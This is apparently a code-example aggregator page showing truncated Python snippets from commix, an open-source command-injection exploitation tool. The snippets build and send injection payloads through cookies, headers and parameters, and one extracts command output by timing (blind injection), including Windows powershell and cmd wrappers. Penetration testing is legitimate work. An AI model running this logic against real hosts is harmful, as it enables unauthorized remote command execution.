  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES)
  for whitespace in settings.WHITESPACE:
    for prefix in settings.EVAL_PREFIXES:
      for suffix in settings.EVAL_SUFFIXES:
        for separator in settings.EVAL_SEPARATORS:

          # If a previous session is available.
          if settings.LOAD_SESSION and session_handler.notification(url, technique):
            url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
            checks.check_for_stored_tamper(payload)
            
          if settings.RETEST == True:
            settings.RETEST = False
            from src.core.injections.results_based.techniques.classic import cb_handler
            cb_handler.exploitation(url, delay, filename, http_request_method)
            
          if not settings.LOAD_SESSION:
            i = i + 1
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            # Change TAG on every request to prevent false-positive results.
            TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

            randv1 = random.randrange(100)
            randv2 = random.randrange(100)
            randvcalc = randv1 + randv2

            # Define alter shell
            alter_shell = menu.options.alter_shell

            try:
              if alter_shell:
                # Classic -alter shell- decision payload (check if host is vulnerable).
                payload = eb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
              else:
                # Classic decision payload (check if host is vulnerable).
                payload = eb_payloads.decision(separator, TAG, randv1, randv2)

              suffix = urllib.quote(suffix)
              # Fix prefixes / suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Fixation for specific payload.
              if ")%3B" + urllib.quote(")}") in payload:
                payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))
              payload = payload +  TAG + ""

              # Whitespace fixation
              payload = re.sub(" ", whitespace, payload)

              if settings.TAMPER_SCRIPTS['base64encode']:
                from src.core.tamper import base64encode
                payload = base64encode.encode(payload)
              else:
                payload = re.sub(" ", "%20", payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL >= 1:
                sys.stdout.write("\n" + settings.print_payload(payload))

              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = eb_injector.cookie_injection_test(url, vuln_parameter, payload)

              # User-Agent Injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                response = eb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer Injection
              elif settings.REFERER_INJECTION == True:
#.........这里部分代码省略.........
开发者ID:HugoDelval,项目名称:commix,代码行数:101,代码来源:eb_handler.py

示例14: fb_injection_handler


#.........这里部分代码省略.........
 
        if not settings.LOAD_SESSION:
          i = i + 1
          # Change TAG on every request to prevent false-positive results.
          TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
          # The output file for file-based injection technique.
          OUTPUT_TEXTFILE = TAG + ".txt"    
          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          try:
            # File-based decision payload (check if host is vulnerable).
            if alter_shell :
              payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
            else:
              payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
                    
            # Check if defined "--prefix" option.
            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)

            if menu.options.base64:
              payload = base64.b64encode(payload)

            # Check if defined "--verbose" option.
            if menu.options.verbose:
              info_msg = "Trying to upload the '" + OUTPUT_TEXTFILE
              info_msg += "' file on '" + settings.SRV_ROOT_DIR + "'..."
              print settings.print_info_msg(info_msg)
              payload_msg = payload.replace("\n", "\\n")
              print settings.print_payload(payload_msg)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)

            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload)          

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              response = fb_injector.referer_injection_test(url, vuln_parameter, payload)

            # Custom HTTP header Injection
            elif settings.CUSTOM_HEADER_INJECTION == True:
              # Check if target host is vulnerable to custom http header injection.
              vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG)
              response = fb_injector.custom_header_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)

            # Find the directory.
            output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay)
            time.sleep(delay)
开发者ID:ardiansn,项目名称:commix,代码行数:67,代码来源:fb_handler.py

示例15: false_positive_check

def false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, timesec, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response):

  if settings.TARGET_OS == "win":
    previous_cmd = cmd
    if alter_shell:
      cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
    else: 
      cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"

  found_chars = False
  info_msg = "Checking the reliability of the used payload "
  info_msg += "in case of a false positive result... "
  if settings.VERBOSITY_LEVEL == 1: 
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
  # Check if defined "--verbose" option.
  elif settings.VERBOSITY_LEVEL > 1:
    print settings.print_info_msg(info_msg)

  # Varying the sleep time.
  timesec = timesec + random.randint(1, 5)

  # Checking the output length of the used payload.
  for output_length in range(1, 3):
    # Execute shell commands on vulnerable host.
    if alter_shell:
      payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method)
    else:
      payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method)
    
    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = payload.replace(" ", whitespace)

    # Perform payload modification
    payload = checks.perform_payload_modification(payload)

    # Check if defined "--verbose" option.
    if settings.VERBOSITY_LEVEL == 1:
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write("\n" + settings.print_payload(payload_msg))
    # Check if defined "--verbose" option.
    elif settings.VERBOSITY_LEVEL > 1:
      info_msg = "Generating a payload for testing the reliability of used payload..."
      print settings.print_info_msg(info_msg)
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write(settings.print_payload(payload_msg) + "\n")

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined host with "INJECT_HERE" tag
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
      how_long = host_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      how_long = custom_header_injection_test(url, vuln_parameter, payload)

    else:  
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)

    if (how_long >= settings.FOUND_HOW_LONG) and (how_long - timesec >= settings.FOUND_DIFF):
      found_chars = True
      break

  if found_chars == True :
    if settings.TARGET_OS == "win":
      cmd = previous_cmd
    num_of_chars = output_length + 1
    check_start = 0
    check_end = 0
    check_start = time.time()
    
    output = []
    percent = 0
    sys.stdout.flush()

    is_valid = False
    for num_of_chars in range(1, int(num_of_chars)):
      for ascii_char in range(1, 20):

        if alter_shell:
          # Get the execution output, of shell execution.
          payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
        else:
          # Get the execution output, of shell execution.
          payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:tb_injector.py


注:本文中的src.utils.settings.print_payload函数示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。